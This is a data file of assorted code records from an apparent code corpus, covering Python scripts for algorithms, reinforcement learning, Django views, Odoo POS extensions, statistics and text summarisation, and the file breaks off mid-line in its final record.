+{"seq_id":"370501147","text":"\"\"\"\n1305. Integer to English Words\nConvert a non-negative integer to its english words representation. Given input is guaranteed to be less than 2^31 - 1.\n\n样例\n123 -> \"One Hundred Twenty Three\"\n12345 -> \"Twelve Thousand Three Hundred Forty Five\"\n1234567 -> \"One Million Two Hundred Thirty Four Thousand Five Hundred Sixty Seven\"\n\"\"\"\nclass Solution:\n \"\"\"\n @param num: a non-negative integer\n @return: english words representation\n \"\"\"\n def numberToWords(self, num):\n # Write your code here\n n1 = [\"\", \"One\", \"Two\", \"Three\", \"Four\", \"Five\",\n \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\",\n \"Eleven\", \"Twelve\", \"Thirteen\", \"Fourteen\", \"Fifteen\",\n \"Sixteen\", \"Seventeen\", \"Eighteen\", \"Nineteen\"]\n n2 = [\"\", \"Ten\", \"Twenty\", \"Thirty\", \"Forty\",\n \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\n n3 = ['Hundred', '', 'Thousand', 'Million', 'Billion']\n res = ''\n index = 1\n if num == 0:\n return 'Zero'\n elif 0 < num < 20:\n return n1[num]\n elif 20 <= num < 100:\n return n2[num // 10] + ' ' + n1[num]\n else:\n while num != '':\n digit = int(str(num)[-3::])\n num = (str(num)[:-3:])\n i = len(str(digit))\n r = ''\n while True:\n if digit < 20:\n r += ' ' + n1[digit] + ' '\n break\n elif 20 <= digit < 100:\n r += ' ' + n2[digit // 10]\n elif 100 <= digit < 1000:\n r += ' ' + n1[digit // 100] + ' ' + n3[0]\n digit = digit % (10 ** (i - 1))\n i -= 1\n r = r.strip()\n if digit != 0 or i >= 1:\n r += ' '+n3[index]+' '\n index += 1\n r += res\n res = r\n return res.strip()","sub_path":"算法 - 其他/字符串处理/1305.Integer to English Words.py","file_name":"1305.Integer to English Words.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"122304325","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mountain_car_q_learning\nfrom mountain_car_q_learning import plot_cost_to_go, StateTransformer, RBFLearnModel, plot_running_avg\n\n\n# the main difference with a basic Q-learning that we calculate G for a multiple steps\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.weights = None\n self.learning_rate = 0.01\n\n # keep in mind that Y is G\n def partial_fit(self, X, Y):\n if self.weights is None:\n dimensions = X.shape[1]\n self.weights = np.random.randn(dimensions) / np.sqrt(dimensions)\n self.weights += self.learning_rate * (Y - X.dot(self.weights)).dot(X)\n\n def predict(self, X):\n return X.dot(self.weights)\n\nmountain_car_q_learning.SGDRegressor = SGDRegressor\n\n# we have to keep N states, rewards and actions\ndef play_one(env, model, eps, gamma, n=5):\n state = env.reset()\n done = False\n total_reward = 0\n rewards = []\n states = []\n actions = []\n # for each step we have to multiply by additional gamma\n n_gammas = np.array([gamma]*n) ** np.arange(n)\n\n while not done:\n action = model.next_action(state, eps)\n\n states.append(state)\n actions.append(action)\n\n prev_state = state\n state, reward, done, info = env.step(action)\n\n rewards.append(reward)\n\n # update model\n if len(rewards) >= n:\n previous_returns = n_gammas.dot(rewards[-n:])\n G = previous_returns + (gamma **n)*np.max(model.predict(state)[0])\n model.update(states[-n], actions[-n], G)\n\n total_reward += reward\n\n rewards = rewards[-n+1:]\n states = states[-n+1:]\n actions = actions[-n+1:]\n\n # according to documentation goal achived if position > 0.5\n win = state[0] >= 0.5\n if win:\n while len(rewards) > 0:\n G = n_gammas[:len(rewards)].dot(rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n else:\n # we lose, so it is a good idea to set negative reward\n while len(rewards) > 0:\n guess_rewards = rewards + [-1]*(n - len(rewards))\n G = n_gammas.dot(guess_rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n return total_reward\n\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n state_transformer = StateTransformer(env)\n model = RBFLearnModel(env, state_transformer, \"constant\")\n gamma = 0.99\n\n N_episodes = 300\n total_rewards = np.empty(N_episodes)\n for episode in range(N_episodes):\n eps = 0.1 * (0.97 ** episode)\n one_episode_reward = play_one(env, model, eps, gamma)\n total_rewards[episode] = one_episode_reward\n if (episode + 1) % 100 == 0:\n print(\"episode:\", episode, \"total reward:\", total_rewards)\n\n plt.plot(total_rewards)\n plt.title(\"Rewards\")\n plt.show()\n\n plot_running_avg(total_rewards)\n plot_cost_to_go(env, model)\n\n\n\n","sub_path":"olena_reinforsment_learning/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"404363","text":"\"\"\"\n\"\"\"\n\nfrom gluegov.lib.tables import XLSTable\nimport xlrd\n\ndef format(x):\n try:\n return str(int(x))\n except:\n return str(x)\n\ndef isNotEmpty(x):\n return x != \"\" and x != \" \"\n\nclass onsXLSTable(XLSTable):\n def parse(self):\n # open file and get the correct sheet\n b = xlrd.open_workbook(self.fileName)\n s = b.sheet_by_index(1)\n\n # get keys\n keylist1 = s.row_values(9)\n keylist2 = s.row_values(10)\n\n # map keylists to one keylist\n keylist = [e for e in map(lambda x, y: x+\" \"+format(y), keylist1, keylist2)]\n keylist = [e for e in filter(lambda x: isNotEmpty(x), keylist)]\n self.fields = keylist\n\n for x in range(13, 463):\n row = s.row_values(x)\n row = [e for e in filter(lambda x: isNotEmpty(x), row)]\n if row != []:\n rowDict = dict(zip(keylist, row))\n self.records.append(rowDict)\n\n\nonsXLSTable(\n \"ons\",\n \"population-and-household-estimates\",\n \"http://www.ons.gov.uk/ons/rel/census/2011-census/population-and-household-estimates-for-england-and-wales---unrounded-figures-for-the-data-published-16-july-2012/rft-1-2-ew-pp04.xls\",\n \"population-and-household-estimates.xls\"\n).parse()\n","sub_path":"server/gluegov/data/ons.py","file_name":"ons.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"293922700","text":"def countdown(number):\n if number >= 0:\n print(number)\n countdown(number - 1)\n\ndef countup(curr, max):\n if curr <= max:\n print(curr)\n countup(curr + 1, max)\n\ndef sil(n):\n if n == 1:\n return 1\n else:\n return n * sil(n - 1)\n\n\n#countdown(10)\n#countup(1, 2)\nnumb = 3\nprint(f\"{numb}! = {sil(numb)}\")","sub_path":"Rekurencja.py","file_name":"Rekurencja.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"533057326","text":"import re\nimport sys\nfrom os import path\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'PACKAGE_README.md')) as f:\n long_description = f.read()\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to pytest\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def run_tests(self):\n import shlex\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(shlex.split(self.pytest_args))\n sys.exit(errno)\n\n\ntests_require = [\n 'pandas',\n 'pytest',\n 'requests_mock',\n 'mock', # needed for Python 2\n 'future', # needed for Python 2\n 'pylint',\n 'pylint2junit'\n]\n\nrelease_require = [\n 'zest.releaser[recommended]>=6.13.5,<6.14',\n 'readme-renderer>=24.0,<25.0',\n 'setuptools >= 38.6.0',\n 'wheel >= 0.31.0',\n 'twine >= 1.11.0',\n]\n\ndev_require = tests_require + [\n 'ipython',\n 'sphinx==1.8.3',\n 'sphinx_rtd_theme==0.1.9',\n 'nbsphinx>=0.2.9,<1',\n 'nbconvert>=5.3,<6',\n 'numpydoc>=0.8.0',\n]\n\n\nwith open('datarobotai/_version.py') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\n\nsetup(name='datarobot-ai',\n version=version,\n description='Python Client for the DataRobot AI API',\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n url='https://github.com/datarobot/datarobot-ai-py',\n author='DataRobot, Inc',\n author_email='support@datarobot.com',\n license='Apache 2.0',\n packages=find_packages(),\n install_requires=[\n 'requests', 'requests_toolbelt', 'six', 'backports.csv'\n ],\n tests_require=tests_require,\n extras_require={\n 'dev': dev_require,\n 'release': release_require,\n 'recommended': ['pandas==0.24.2'],\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n cmdclass={'test': PyTest},\n include_package_data=True,\n zip_safe=False)\n","sub_path":"pypi_install_script/datarobot-ai-1.0.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"370861894","text":"# header\nheader = {'Content-Type\t':'application/x-www-form-urlencoded'}\n# 文字识别api地址\ngeneral_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic'\n# 语种字典\nlanguage_dict = {'中英混合':'CHN_ENG',\n '英文':'ENG',\n '葡萄牙语':'POR',\n '法语':'FRE',\n '德语':'GER',\n '意大利语':'ITA',\n '西班牙语':'SPA',\n '俄语':'RUS',\n '日语':'JAP',\n '韩语':'KOR'\n }\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61264607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView # Import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom django.shortcuts import get_object_or_404\nfrom main.models import Employees\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.views import generic\n# Create your views here.\n#def home(request):\n# return HttpResponse(\"Hello World!\")\n\n#def home(request):\n# return render(request, \"main/home.html\", {'message': 'hi, sumit'})\n\ndef homepage(request):\n# employees=User.objects.all()\n employees = Employees.objects.all()\n# emp = employees.filter(user_id=\"sumitka\")\n return render(request, 'home.html', context={'employees':employees},\n )\n\nclass UserList(ListView):\n model = Employees\n template_name = 'home.html'\n# def get_context_data(self, **kwargs):\n# # Call the base implementation first to get a context\n# context = super(UserList, self).get_context_data(**kwargs)\n# # Get the blog from id and add it to the context\n# context['some_data'] = 'This is just some data'\n# return context\n\ndef index(request):\n homepage = Employees.objects.all()\n return render(request, 'index.html', {'homepage': homepage})\n\n# Add the two views we have been talking about all this time :)\n#class HomePageView(TemplateView):\n# template_name = \"home.html\"\n\n\n\nclass UserCreateView(generic.CreateView):\n from_class = UserCreationForm\n model = User\n template_name = 'createuser.html'\n# def __init__(self, arg):\n# super(UserCreateView, self).__init__()\n# self.arg = arg\n\n\nclass AboutPageView(TemplateView):\n template_name = \"about.html\"\n\n# Add this view\nclass DataPageView(TemplateView):\n def get(self, request, **kwargs):\n # we will pass this context object into the\n # template so that we can access the data\n # list in the template\n context = {\n 'data': [\n {\n 'name': 'Celeb 1',\n 'worth': '3567892'\n },\n {\n 'name': 'Celeb 2',\n 'worth': '23000000'\n },\n {\n 'name': 'Celeb 3',\n 'worth': '1000007'\n },\n {\n 'name': 'Celeb 4',\n 'worth': '456789'\n },\n {\n 'name': 'Celeb 5',\n 'worth': '7890000'\n },\n {\n 'name': 'Celeb 6',\n 'worth': '12000456'\n },\n {\n 'name': 'Celeb 7',\n 'worth': '896000'\n },\n {\n 'name': 'Celeb 8',\n 'worth': '670000'\n }\n ]\n }\n\n return render(request, 'data.html', context)\n","sub_path":"old_skillset/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"365082858","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport time\n\n#n 5 x 5 board size\n#k 3 num of obstacles\n#r_q 4 row of queen\n#c_q 3 col of queen\n#obstacles array of obs r,c\n# 5 3 4 3 [[5, 5], [4, 2], [2, 3]]\n\n\n# 3,3 [4,3],[4,4],[3,4],[2,4],[2,3],[2,2],[3,2],[4,2]\n\n\n\n# Complete the queensAttack function below.\ndef queensAttack(n, k, r_q, c_q, obstacles):\n r = r_q\n c = c_q\n m = r_q - c_q\n mp = r_q + c_q\n move_count = 0\n obs = []\n #get nearest obstacles\n for x in range(k):\n if obstacles[x][0] == r_q or obstacles[x][1] == c_q or obstacles[x][0] - obstacles[x][1] == m or obstacles[x][0] + obstacles[x][1] == mp:\n obs.append(obstacles[x])\n print(obs)\n\n\n # print(obstacles[x][0])\n # if obstacles[x]\n\n # all_moves = []\n # for x in range(n):\n # coords_to_add = [[r+1+x,c],[r-1-x,c],[r+1+x,c+1+x],[r+x,c-1+x],[r+x,c+1+x],[r-1+x,c-1+x],[r-1+x,c],[r-1,c+1]]\n # print(coords_to_add)\n \n\n \n\n\n\n\nstart_time = time.time()\nqueensAttack(8,7,3,5,[[3,1], [3,7], [6,5], [5,3], [5,7], [2,4], [1,7]])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"hr_queen_attack_3.py","file_name":"hr_queen_attack_3.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"513578090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 08 22:56:35 2018\r\n\r\n@author: matth\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport textract\r\n#from difflib import get_close_matches, SequenceMatcher\r\n#from collections import Counter\r\n#import re\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\nimport gensim.summarization.summarizer as summ\r\nimport json\r\n\r\n#def count_close_matches(word,list_text,cutoff):\r\n# out = get_close_matches(word,list_text,1000,cutoff)\r\n# return len(out)\r\n\r\nfiles = os.listdir(\"../\")\r\n\r\nn_files = np.size(files)\r\nn = 337\r\nwhile n < n_files:\r\n \"\"\"n_files:\"\"\"\r\n \"\"\"if file[n][-3:-1]\"\"\"\r\n if files[n][-4:] == \".pdf\":\r\n print(\"\\nReadingFile: \"+files[n]+\" (\"+str(n+1)+\" of \"+str(n_files)+\")\")\r\n text = textract.process(\"../\"+files[n],\\\r\n method='tesseract',\\\r\n language='eng',\\\r\n )\r\n d_text = text.decode(\"UTF-8\",\"replace\")\r\n# l_text_1 = re.findall(r\"[\\w']+\",d_text)\r\n# l_text_2 = d_text.replace(\"\\n\",\" \")\r\n# l_text_2.replace(\".\",\" \")\r\n# l_text_2.replace(\"?\",\" \")\r\n# l_text_2 = d_text.split(\" \")\r\n# ll_text_1 = [text.lower() for text in l_text_1]\r\n# ll_text_2 = [text.lower() for text in l_text_2]\r\n \r\n wordcloud_1 = WordCloud(collocations=False,regexp=r\"\\w[\\w'-]+|[0-9]+\\s[\\w]+\").generate(d_text)\r\n file = open(\"./\"+files[n][0:-4]+\"_keywords.txt\",'w')\r\n file.write(json.dumps(wordcloud_1.words_).replace(\" \",\"\\n\"))\r\n file.close()\r\n \r\n# wordcloud_2 = WordCloud.generate(ll_text_2)\r\n \r\n fig1 = plt.figure()\r\n plt.imshow(wordcloud_1,interpolation='bilinear')\r\n plt.axis(\"off\")\r\n plt.show()\r\n fig1.savefig(\"./\"+files[n][0:-4])\r\n \r\n \r\n ss = summ.summarize(d_text,ratio=0.2)\r\n file = open(\"./\"+files[n][0 :-3]+\"txt\",'w')\r\n file.write(ss)\r\n file.close()\r\n# plt.figure()\r\n# plt.imshow(wordcloud_2,interpolation='bilinear')\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(type(d_text))\r\n# keywords = [\"nanomaterials\",\"biomedical\",\"spectrum\",\"x-ray\",\"gamma\",\\\r\n# \"radiation\",\"semiconductor\",\"quantum\",\"reconstruction\",\\\r\n# \"geometry\",\"spectral\",\"optogenetics\",\"erg\",\"ecog\",\"photon\",\\\r\n# \"patch-clamp\",\"electrophysiology\",\"electroretinography\",\\\r\n# \"imaging\",\"therapy\",\"diagnostic\",\"theranostic\",\"protein\",\\\r\n# \"delivery\",\"nanoparticle\",\"upconversion\",\"fluorescence\",\\\r\n# \"light\",\"visible\",\"k-edge\",\"absorption\",\"antioxidant\",\\\r\n# \"oxidative\",\"stress\",\"g-protein\",\"gpcr\",\"opsin\",\\\r\n# \"rhodopsin\",\"genetics\",\"energy\",\"scatter\",\"pulse\",\"dose\",\\\r\n# \"rf\",\"infrared\",\"nir\",\"electronics\",\"pulse-train\",\\\r\n# \"waveform\",\"electricity\",\"electron\",\"neural\",\"network\",\\\r\n# \"lightning\",\"radon\",\"particle\",\"wave\",\"microscopy\",\"field\",\\\r\n# \"mutation\",\"single-strand\",\"double-strand\",\"free\",\"radical\",\\\r\n# \"magnetic\",\"mri\",\"dti\",\"fmri\",\"detector\",\"ccd\",\"emccd\",\\\r\n# \"pmt\",\"uv\",\"ultraviolet\",\"dna\",\"eye\",\"retina\",\"genomics\",\\\r\n# \"proteomics\",\"scatter\",\"water\",\"fungi\",\"tissue\",\"single-cell\",\\\r\n# \"cell\",\"review\",\"abstract\",\"methods\",\"results\",\"conclusions\",\\\r\n# \"discussion\",\"cancer\",\"statistics\",\"machine-learning\",\\\r\n# \"aperture\",\"grating\",\"interferometry\",\"response\",\"a-wave\",\\\r\n# \"b-wave\",\"frequency\",\"damage\"]\r\n# l_m = 0\r\n# for word in keywords:\r\n# if len(word) > l_m:\r\n# l_m = len(word)\r\n# \r\n# \r\n# offset = l_m + 4\r\n# \r\n# for word in keywords:\r\n# num = count_close_matches(word,ll_text_2,0.85)\r\n# print(\"Instances of \"+word+\":\"+\" \"*(offset-len(word))+str(num))\r\n# \r\n# counts = Counter(l_text_l)\r\n# print(counts)\r\n \r\n n += 1\r\n \r\n","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"328921843","text":"# jacob clarkson\n# project euler problem 10\n# january 2015\n\n# program to find the sum of all the prime numbers below 2 million\n\nimport math\n\n# method to check if a number is a prime number (reasonably efficient trial division method)\ndef isPrime(x):\n\tfor i in range (3, int(math.sqrt(x) + 1)):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\nsum = 2\nfor x in range (2, 2000000):\n\tif x%2 != 0:\n\t\tif isPrime(x) == True:\n\t\t\tsum += x\n\nprint (sum)","sub_path":"Prob10.py","file_name":"Prob10.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"639344885","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2013 BroadTech IT Solutions.\n# (http://wwww.broadtech-innovations.com)\n# contact@boradtech-innovations.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields\n\nfrom psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED\nimport time\n\nclass pos_order(models.Model):\n _inherit = 'pos.order'\n \n return_order = fields.Boolean('Returned', readonly=True, help='To identify the order is returned or not!')\n \n def create(self, cr, user, vals, context=None):\n for val in vals.get('lines'):\n for key in val:\n if isinstance(key, dict):\n order_id = key.get('order_id')\n if order_id:\n refund_reference = self.browse(cr, user, order_id, context).pos_reference\n if refund_reference:\n vals.update({'pos_reference': 'Refund'+' '+refund_reference,\n 'return_order': True})\n cr._cnx.set_isolation_level(ISOLATION_LEVEL_READ_COMMITTED)\n return super(pos_order, self).create(cr, user, vals, context)\n \n def _order_fields(self, cr, uid, ui_order, context=None):\n fields = {\n 'name': ui_order['name'],\n 'user_id': ui_order['user_id'] or False,\n 'session_id': ui_order['pos_session_id'],\n 'lines': ui_order['lines'],\n 'pos_reference':ui_order['name'],\n 'partner_id': ui_order['partner_id'] or False,\n }\n if ui_order['return_status'] == 'active':\n fields.update({'return_order': ui_order['return_order']})\n return fields\n \n def create_from_ui(self, cr, uid, orders, context=None):\n # Keep only new orders\n submitted_references = [o['data']['name'] for o in orders]\n existing_order_ids = self.search(cr, uid, [('pos_reference', 'in', submitted_references)], context=context)\n existing_orders = self.read(cr, uid, existing_order_ids, ['pos_reference'], context=context)\n existing_references = set([o['pos_reference'] for o in existing_orders])\n orders_to_save = [o for o in orders if o['data']['name'] not in existing_references]\n\n order_ids = []\n\n for tmp_order in orders_to_save:\n to_invoice = tmp_order['to_invoice']\n order = tmp_order['data']\n if order['return_status'] == 'active':\n order.update({'return_order': True})\n order_id = self._process_order(cr, uid, order, context=context)\n order_ids.append(order_id)\n\n try:\n self.signal_workflow(cr, uid, [order_id], 'paid')\n except Exception as e:\n _logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n if to_invoice:\n self.action_invoice(cr, uid, [order_id], context)\n order_obj = self.browse(cr, uid, order_id, context)\n self.pool['account.invoice'].signal_workflow(cr, uid, [order_obj.invoice_id.id], 'invoice_open')\n\n return order_ids\n \npos_order()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"humanytek_pos/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"353198543","text":"#!/usr/bin/python\n# coding: latin-1\nimport numpy as np\nimport scipy.stats.distributions as distributions\n\n\"\"\"\n CONTINGENCY TABLE ANALYSIS (CTA)\n\n Test of the association between em2D and RMSD using CTA (Num. Rec. 2007, sec. 14.4)\n\"\"\"\n\n\ndef cta_chi_square(X,Y,bins):\n \"\"\"\n Contingency Table Analysis\n Measure of the association of variables X and Y with the chi-square\n statistic. Num. Rec. 14.4.1\n bins - the number of bins to form for the association test\n output - The p-value of the chi-square test\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n X2 = 0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n # print \"i,j\",i,j\n if(Nx[i] == 0 or Ny[j] == 0):\n continue # ignore empty bins\n nij = 1.0* Nx[i] * Ny[j] / N\n X2 += 1.0 * ( (CT[i][j] - nij)**2 ) / nij\n deg = bins*bins-bins-bins+1 # Degrees of freedom\n chi2 = distributions.chi2\n Q = 1-chi2.cdf(X2, deg)\n return Q\n\n\ndef mutual_information(X, Y, bins):\n \"\"\"\n Mutual information between X and Y sets of values. The values are\n tabulated in a table of bins x bins size.\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n # Mutual information\n I = 0\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n I += pij * np.log(pij/ (Px[i] * Py[j]) )\n return I\n \ndef uncertainty_coefficient(X, Y, bins):\n \"\"\"\n Uncertainty coefficient of Y respect to X\n 0 - no relationship\n 1 - perfect relationship\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n I = mutual_information(X, Y, bins)\n # entropy of Y given X\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n Hyx =0.0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n Hyx += pij * np.log(pij/Px[i] )\n Hyx = -1 * Hyx \n # entropy of Y \n Hy = (-1.) * np.sum([p*np.log(p) for p in Py if p> epsilon]) \n return (Hy-Hyx)/Hy\n \n","sub_path":"math/mutual_information.py","file_name":"mutual_information.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"18071867","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.db import models\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom django.contrib.contenttypes import generic\r\nfrom django.contrib.contenttypes.models import ContentType\r\n\r\nclass Seo(models.Model):\r\n class Meta:\r\n verbose_name = _('SEO fields')\r\n verbose_name_plural = _('SEO fields')\r\n unique_together = ((\"content_type\", \"object_id\"),)\r\n\r\n title = models.CharField(verbose_name=_('Title'),\r\n max_length=200, default='', blank=True)\r\n description = models.CharField(verbose_name=_('Description'),\r\n max_length=200, default='', blank=True)\r\n keywords = models.CharField(verbose_name=_('Keywords'),\r\n max_length=1000, default='', blank=True)\r\n\r\n content_type = models.ForeignKey(ContentType)\r\n object_id = models.PositiveIntegerField()\r\n content_object = generic.GenericForeignKey('content_type', 'object_id')\r\n\r\n def __unicode__(self):\r\n return self.title\r\n\r\nclass Url(models.Model):\r\n class Meta:\r\n verbose_name = _('URL')\r\n verbose_name_plural = _('URLs')\r\n\r\n url = models.CharField(verbose_name=_('URL'),\r\n max_length=200, default='/', unique=True,\r\n help_text=_(\"This should be an absolute path, excluding the domain name. Example: '/events/search/'.\"))\r\n\r\n def get_absolute_url(self):\r\n return self.url\r\n\r\n def __unicode__(self):\r\n return self.url\r\n","sub_path":"virtual/lib/python3.6/site-packages/seo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"532424213","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nimport pickle\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport scipy\n\n\n# Suppress runtimewarning due to pandas bug\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n# *********************************************\n# Set up defaults\n# *********************************************\nplot = False\nsave = False\nprint_diagnoistic = True\n\n# *********************************************\n# Load Data\n# ********************************************\ndata_dir = os.path.expanduser('~')\nbias2_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias2_parameter_fits.pkl', 'rb'))\nbias1_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias1_parameter_fits.pkl', 'rb'))\neoptimal_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/eoptimal_parameter_fits.pkl', 'rb'))\nignore_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/ignore_parameter_fits.pkl', 'rb'))\nmidline_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/midline_parameter_fits.pkl', 'rb'))\nswitch_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/switch_parameter_fits.pkl', 'rb'))\nmemory_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/memory_parameter_fits.pkl', 'rb'))\nperseverance_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/perseverance_parameter_fits.pkl', 'rb'))\npermem_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/permem_parameter_fits.pkl', 'rb'))\n\ngtrain_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_df.pkl')\ngtrain_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_learn_df.pkl')\ngtest_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_learn_df.pkl')\ngtest_conform_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_conform_df.pkl')\ngtest_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_df.pkl')\ngtrain_learn_df.id = gtrain_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\ngtest_learn_df.id = gtest_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\n\n\n# *********************************************\n# Select Dataset\n# ********************************************* \nmodel = 'TS'\ndf = gtest_df.copy()\nif 'midline_posterior' in df.columns:\n df.drop(['midline_posterior','midline_posterior_cross'], axis = 1, inplace = True)\n\n# *********************************************\n# Additional Variables\n# ********************************************* \nfor models in 